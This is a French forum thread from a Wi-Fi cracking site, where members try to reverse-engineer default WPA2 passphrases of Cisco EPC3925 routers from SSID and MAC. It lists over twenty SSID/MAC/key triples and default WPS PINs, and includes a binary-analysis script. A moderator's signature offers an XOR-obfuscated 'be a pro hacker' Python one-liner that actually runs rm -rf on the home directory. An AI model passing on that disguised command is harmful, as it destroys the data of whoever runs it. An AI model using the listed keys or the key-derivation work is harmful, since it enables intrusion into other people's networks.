Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 17-12-2016 13:10:00

wizzhard
Membre
Inscription : 12-04-2011
Messages : 15

WPA passphrase d'origine routeur CISCO

Bonjour a tous,

Tout d'abord merci a M1ck3y de m'avoir reset mon mdp afin de pouvoir de nouveau revenir ici.

Je viens vous demandé un coup de main concernant une possible (et même sûr) faille concernant les clés WPA d'origine des routeurs CISCO.

Primo, toutes les clés suivantes sont bien sur avec l'autorisation de mes AMIS.

J'ai remarqué ici sur notre ile ( je n'habite pas en France ) que toutes les clés d'origine fournit par notre FAI commençaient par 2.

Déjà cela limite vachement le poids des dico...

Mais j'ai remarqué aussi que selon l'ESSID, la MAC du routeur correspondait aussi.

Je ne suis pas bon en HEXA voila pourquoi je vous demande un coup de main mais je suis sur qu'un générateur peut être créer avec ce qui suit. je vais vous fournir l'ESSID, suivit de la MAC de la Box ainsi que la clé.

Mes amis et moi aussi autorisent que je les partages, ils étaient d’ailleurs sur le c*l lorsque j'ai attrapé un handshake sur leur réseau ( plus facile avec le dico quand on connait la clé) et que je leur ai montré cracké leur passphrase.

1AC244 : dc:fe:07:20:51:a7 : 278942151
FE16CA : 30:b5:c2:a1:10:55 : 265426561
A6BDEC : 20:25:64:5e:12:2a : 268259727
24B2CE : c0:7c:d1:ed:fd:2d : 278325817

et les deux derniers regardé bien la correspondance :

8BA00E : e0:69:95:38:3f:df : 232016885
8B96EA : e0:69:95:31:46:85 : 232016238

ce qui voudrait dire que lorsque l'ESSID commence par 8B, la mac commence par e0:69:95 et la WPA2 232016

cela ne peut pas être une coïncidence.

Si quelqu'un a une idée et veut filer un coup de main ce serait merveilleux car je me répet je ne suis pas bon du tout en HEXA.

Merci a tous .

Dernière modification par wizzhard (17-12-2016 13:13:57)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 17-12-2016 13:40:44

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 401

Re : WPA passphrase d'origine routeur CISCO

Je connais mal Cisco mais j'avoue que ça saute au yeux, donc rien qu'a partir de ces donnés, si il s'agit des meme version de routeurs, firmware etc... on pourrait créer une liste de clé commençant par:

278942
265426
268259
278325
232016

Les 3 derniers chiffres étant rapidement intégré dans le dico de 0 a 9, ça pourrait etre très rapide a bruteforcer.Il faudrait pouvoir accéder au firmware je suis sur que ça donnerai quelque chose d'intéressant, ou alors utiliser le code qu'avait fait Spawn a l'époque pour les Livebox (je me rapelle plus le nom) qui permet de tester des valeurs basé sur l'essid la mac la clé et le numéro de série, d'ailleurs le numéro de série il ressemble a quoi ? quel est le modèle exact du routeur ?

Dernière modification par koala (17-12-2016 13:41:42)

Hors Ligne

#3 17-12-2016 13:49:50

wizzhard
Membre
Inscription : 12-04-2011
Messages : 15

Re : WPA passphrase d'origine routeur CISCO

Salut Koala,

merci pour ta reponse, oui effectivement j'ai creer ce type de dico avec crunch mais je suis sur qu'on pourrait aller encore plus vite.

Routeur model : cisco epc3925 eurodocsis 3.0 HW 1.0

un peu de doc :

http://www.cisco.com/c/dam/en/us/td/doc … 1192_B.pdf

merci du coup de main

Hors Ligne

#4 17-12-2016 23:03:14

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 326

Re : WPA passphrase d'origine routeur CISCO

A mon avis la relation est directe avec le numéro de série... 
autre détail selon la doc Cisco, le routeur à le WPS en mode PIN activé par défaut avec PIN 12345670
Il serait intéressant que tu nous passe des paquets probes et mëme un capture d'un échange WPS pour voir en détail le M1.

EDIT: en regardant chez nos amis méxicain de Megacable nous pouvons lire:

El Nombre de la Red corresponde a los últimos 6 dígitos del numero de serie del equipo MTA mientras que la contraseña son los 10 dígitos del número de serie del equipo.

le mot de passe sont les 10 numéros qui composent le numéro de série
https://www.megacable.com.mx/soporte/25 … c3925.html

EDIT2: Chez nos amis hongrois le pass se base sur la mac et le numéro de série et est facilement dérivable.
- Cisco EPC3925, ESIP-12-v302r125573-131230c_upc

EDIT3 Chez telecable en espagne c'est aussi le numérie de série

Dernière modification par kcdtv (18-12-2016 18:53:40)

Hors Ligne

#5 05-01-2017 13:31:35

wizzhard
Membre
Inscription : 12-04-2011
Messages : 15

Re : WPA passphrase d'origine routeur CISCO

Bonjour a tous,

Tout d'abord merci pour votre réponse ensuite Bonne et heureuse année a vous.

Je reviens vers vous avec un peu plus d'informations. Le script python proposé sur EDIT 2 (kcdtv) n'est malheureusement pas fonctionnel. Je l'ai tester et il ne donne pas la bonne clé, surtout qu'il ne fonctionne qu'avec les anciens BSSID (numerique) et pas les nouveaux (Hexa).

Deuxiemement, testé sur mon réseau et celui de deux amis, Reaver ne fonctionne pas... il fonctionnait sur les premiers routeurs mais depuis ils ont patché sans doute le firmware car avant de recevoir le M2, je reçoit un WPS TRANSACTION FAILED.

le WPS d'origine 12345670 a été changé lors du patch. J'ai par contre regarder sur différents routeur de même model et le WPS d'origine est pour tout le monde pareil : 94380507.

Seul le Gateway PIN est différent selon les mêmes routeurs.

Malgré tout en rajoutant le WPS dans reaver toujours pareil pas de M2, WPS ERROR.

Voici un petit pack contenant les passphrasses, des M1 aussi, R-nonces, Authkey....

petit pack

"Ma carte est parfaitement configurée bien sur et accepte l'injection."

merci a vous

Dernière modification par wizzhard (05-01-2017 13:34:19)

Hors Ligne

#6 21-01-2017 00:33:43

takeover
Nouveau membre
Inscription : 23-05-2015
Messages : 7

Re : WPA passphrase d'origine routeur CISCO

vu conne le pin for rooter bbox2   or bbox3  ( Belgique ) ???  o vu ave le pin Mac C0:D9:62   Device Name SagemComAp model name EMTA42-1  MODEL NUMBER 123456   serie 00000001  !

Hors Ligne

#7 21-01-2017 13:45:14

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 326

Re : WPA passphrase d'origine routeur CISCO

Oupssssssss..... désolé, je n'avais pas vu le petit paquet...  Merci pour l'info très utile l'ami.... à plus

Hors Ligne

#8 21-01-2017 14:05:12

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 012

Re : WPA passphrase d'origine routeur CISCO

Énorme !!!!

Je pense qu'une opération de shift à partir des octets connus est utilisée, puisqu'il y a une relation entre SSID et MAC. (et manifestement key big_smile)

Je pense aussi que les clefs sont des représentations décimales de quelques octets.

Pour identifier les copies et décalages entre les données, je les ai représentées en binaire. Faites chauffer vos yeux et vos claviers big_smile

[email protected]:~$ ./cisco.py 
ssid   mac          hex(key) key       bin(key)                         bin(ssid)                bin(mac)
1ac244 dcfe072051a7 10a051c7 278942151 00010000101000000101000111000111 000110101100001001000100 110111001111111000000111001000000101000110100111
fe16ca 30b5c2a11055 0fd21681 265426561 00001111110100100001011010000001 111111100001011011001010 001100001011010111000010101000010001000001010101
a6bdec 2025645e122a 0ffd518f 268259727 00001111111111010101000110001111 101001101011110111101100 001000000010010101100100010111100001001000101010
24b2ce c07cd1edfd2d 1096ea39 278325817 00010000100101101110101000111001 001001001011001011001110 110000000111110011010001111011011111110100101101
8ba00e e06995383fdf 0dd44bf5 232016885 00001101110101000100101111110101 100010111010000000001110 111000000110100110010101001110000011111111011111
8b96ea e06995314685 0dd4496e 232016238 00001101110101000100100101101110 100010111001011011101010 111000000110100110010101001100010100011010000101

Voici le script utilisé :

#!/usr/bin/env python3

import codecs
import struct

class Box:
	def __init__(self,ssid,mac,key):
		self.ssid = ssid
		self.mac = mac
		self.key = key
		self.ssid_b = bytes.fromhex(self.ssid)
		self.mac_b = bytes.fromhex(''.join(self.mac.split(':')))
		self.key_b = struct.pack('>I',int(self.key))
		self.key_i = int(self.key)

	def __str__(self):
		return '{:6s} {:12s} {} {} {} {} {}'.format(
			str(codecs.encode(self.ssid_b,'hex'),'ascii'),
			str(codecs.encode(self.mac_b,'hex'),'ascii'),
			str(codecs.encode(self.key_b,'hex'),'ascii'),
			self.key_i,
			''.join(['{:08b}'.format(x) for x in self.key_b]),
			''.join(['{:08b}'.format(x) for x in self.ssid_b]),
			''.join(['{:08b}'.format(x) for x in self.mac_b]),
		)

if __name__ == '__main__':
	boxes = [Box(*i) for i in [
		['1AC244','dc:fe:07:20:51:a7','278942151'],
		['FE16CA','30:b5:c2:a1:10:55','265426561'],
		['A6BDEC','20:25:64:5e:12:2a','268259727'],
		['24B2CE','c0:7c:d1:ed:fd:2d','278325817'],
		['8BA00E','e0:69:95:38:3f:df','232016885'],
		['8B96EA','e0:69:95:31:46:85','232016238'],
	]]
	for box in boxes:
		print(box)

@582a1cb9 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#9 22-01-2017 10:27:28

takeover
Nouveau membre
Inscription : 23-05-2015
Messages : 7

Re : WPA passphrase d'origine routeur CISCO

ils sont mes réseaux (nous avons tous essayé différents programmes pour trouver le pin, mais ne parviennent pas! si quelqu'un sait une épingle de ma liste !! s'il vous plaît laissez-moi dire à 00:19:70 mac` était pin 1234567, ou changé, mais pas SNAP du tout !!! Je suis en Belgique Bruxelles !   1  or 2

Dernière modification par takeover (22-01-2017 10:30:21)

Hors Ligne

#10 22-01-2017 10:54:20

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 401

Re : WPA passphrase d'origine routeur CISCO

Merci du partage Spawn smile

Hors Ligne

#11 22-01-2017 11:41:04

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 326

Re : WPA passphrase d'origine routeur CISCO

big_smile
Tu me fais tourner la tête (surtout avec le shift en binaire)

Hors Ligne

#12 22-01-2017 15:15:19

wizzhard
Membre
Inscription : 12-04-2011
Messages : 15

Re : WPA passphrase d'origine routeur CISCO

Salut les gars, encore une fois merci du coup de main, mais d'abord... pour etre clair.

Takeover, ( i gonna speak english as his French is totally crap ) i don't know what you are speaking about, i'm not speaking about SAGEM Modem but Cisco and i'm not living in Belgium or Bruxelle, so please stay focus on this post, i don't want this to become unnecessary... again stay focus or open a personnal post. thank you.

Merci a Kcdtv et Koala qui sont toujours présent quand a Spawn quel boulot. Je viens de tester ton script et effectivement surtout pour les deux derniers reseaux on voit tres bien que sur la KEY BIN seul les dix derniers changent.

Voici une petite liste un peu plus exhaustive.

1ac244 : 278942151 : dc:fe:07:20:51:a7
88aca0 : 279257391 : dc:fe:07:2c:b3:7e
88280a : 279223348 : dc:fe:07:2d:0a:ae
a6bdec : 268259727 : 20:25:64:5e:12:2a
a69aca : 268258305 : 20:25:64:5e:17:32
8ba00e : 232016885 : e0:69:95:38:3f:df
8b96ea : 232016238 : e0:69:95:31:46:85
bd286e : 269963739 : 60:02:92:15:1a:a0
bd0444 : 269962195 : 60:02:92:15:1d:38
24b2ce : 278325817 : c0:7c:d1:ed:fd:2d 
24b0dc : 278325734 : c0:7c:d1:ee:2a:2d
158f16 : 277400570 : c0:7c:d1:19:b0:0b
15c8be : 277424846 : c0:7c:d1:31:c8:0c
15d032 : 277425164 : c0:7c:d1:31:d4:18
82e564 : 261516459 : 7c:05:07:53:fb:b7
82cd1c : 261515007 : 7c:05:07:54:06:97
82f764 : 261518079 : 7c:05:07:41:7f:fa
53d0a5 : 272519122 : d8:97:ba:49:56:1a
539901 : 272436112 : d8:97:ba:42:e4:29
50ea07 : 271846042 : d8:97:ba:37:c0:7c
9c1c96 : 266260302 : 0c:54:a5:38:02:33
9c30ac : 266261162 : 0c:54:a5:xx:xx:xx
0f0600 : 276154573 : 74:85:2a:16:88:35
fe16ca : 265426561 : 30:b5:c2:a1:10:55
6cfa98 : 240546341 : a2:2b:b0:b4:54:78

Résultat de ton Script ( merci Spawn ) :

1ac244 dcfe072051a7 10a051c7 278942151 00010000101000000101000111000111 000110101100001001000100 110111001111111000000111001000000101000110100111
88aca0 dcfe072cb37e 10a5212f 279257391 00010000101001010010000100101111 100010001010110010100000 110111001111111000000111001011001011001101111110
88280a dcfe072d0aae 10a49c34 279223348 00010000101001001001110000110100 100010000010100000001010 110111001111111000000111001011010000101010101110
a6bdec c07cd1edfd2d 1096ea39 278325817 00010000100101101110101000111001 101001101011110111101100 110000000111110011010001111011011111110100101101
a69aca 2025645e1732 0ffd4c01 268258305 00001111111111010100110000000001 101001101001101011001010 001000000010010101100100010111100001011100110010
8ba00e e06995383fdf 0dd44bf5 232016885 00001101110101000100101111110101 100010111010000000001110 111000000110100110010101001110000011111111011111
8b96ea e06995314685 0dd4496e 232016238 00001101110101000100100101101110 100010111001011011101010 111000000110100110010101001100010100011010000101
bd286e 600292151aa0 101751db 269963739 00010000000101110101000111011011 101111010010100001101110 011000000000001010010010000101010001101010100000
bd0444 600292151d38 10174bd3 269962195 00010000000101110100101111010011 101111010000010001000100 011000000000001010010010000101010001110100111000
24b2ce c07cd1edfd2d 1096ea39 278325817 00010000100101101110101000111001 001001001011001011001110 110000000111110011010001111011011111110100101101
24b0dc c07cd1ee2a2d 1096e9e6 278325734 00010000100101101110100111100110 001001001011000011011100 110000000111110011010001111011100010101000101101
158f16 c07cd119b00b 1088cbfa 277400570 00010000100010001100101111111010 000101011000111100010110 110000000111110011010001000110011011000000001011
15c8be c07cd131c80c 10892ace 277424846 00010000100010010010101011001110 000101011100100010111110 110000000111110011010001001100011100100000001100
15d032 c07cd131d418 10892c0c 277425164 00010000100010010010110000001100 000101011101000000110010 110000000111110011010001001100011101010000011000
82e564 7c050753fbb7 0f966cab 261516459 00001111100101100110110010101011 100000101110010101100100 011111000000010100000111010100111111101110110111
82cd1c 7c0507540697 0f9666ff 261515007 00001111100101100110011011111111 100000101100110100011100 011111000000010100000111010101000000011010010111
82f764 7c0507417ffa 0f9672ff 261518079 00001111100101100111001011111111 100000101111011101100100 011111000000010100000111010000010111111111111010
53d0a5 d897ba49561a 103e4fd2 272519122 00010000001111100100111111010010 010100111101000010100101 110110001001011110111010010010010101011000011010
539901 d897ba42e429 103d0b90 272436112 00010000001111010000101110010000 010100111001100100000001 110110001001011110111010010000101110010000101001
50ea07 d897ba37c07c 10340a9a 271846042 00010000001101000000101010011010 010100001110101000000111 110110001001011110111010001101111100000001111100
9c1c96 0c54a5380233 0fdecf4e 266260302 00001111110111101100111101001110 100111000001110010010110 000011000101010010100101001110000000001000110011
0f0600 74852a168835 1075c8cd 276154573 00010000011101011100100011001101 000011110000011000000000 011101001000010100101010000101101000100000110101
fe16ca 30b5c2a11055 0fd21681 265426561 00001111110100100001011010000001 111111100001011011001010 001100001011010111000010101000010001000001010101
6cfa98 a22bb0b45478 0e567225 240546341 00001110010101100111001000100101 011011001111101010011000 101000100010101110110000101101000101010001111000

Les choses s'éclaircissent... peut etre avec ceci, on pourrait aller plus loin.

Merci encore

Hors Ligne

#13 23-01-2017 10:18:08

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 393

Re : WPA passphrase d'origine routeur CISCO

Hello,

Merci d'éditer tes balises images invalides et de t'exprimer de manière compréhensible takeover.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
Configuration AP Cisco par Vincent_vb
3 478 09-04-2017 21:15:36 par Vincent_vb
0 233 05-04-2017 21:29:18 par bilou3000
10 2092 05-01-2017 13:18:24 par wizzhard
4 526 04-12-2016 16:20:59 par pwerrick
Routeur avec antenne amovible par le flibustier
0 466 07-11-2016 19:12:24 par le flibustier

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.028 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]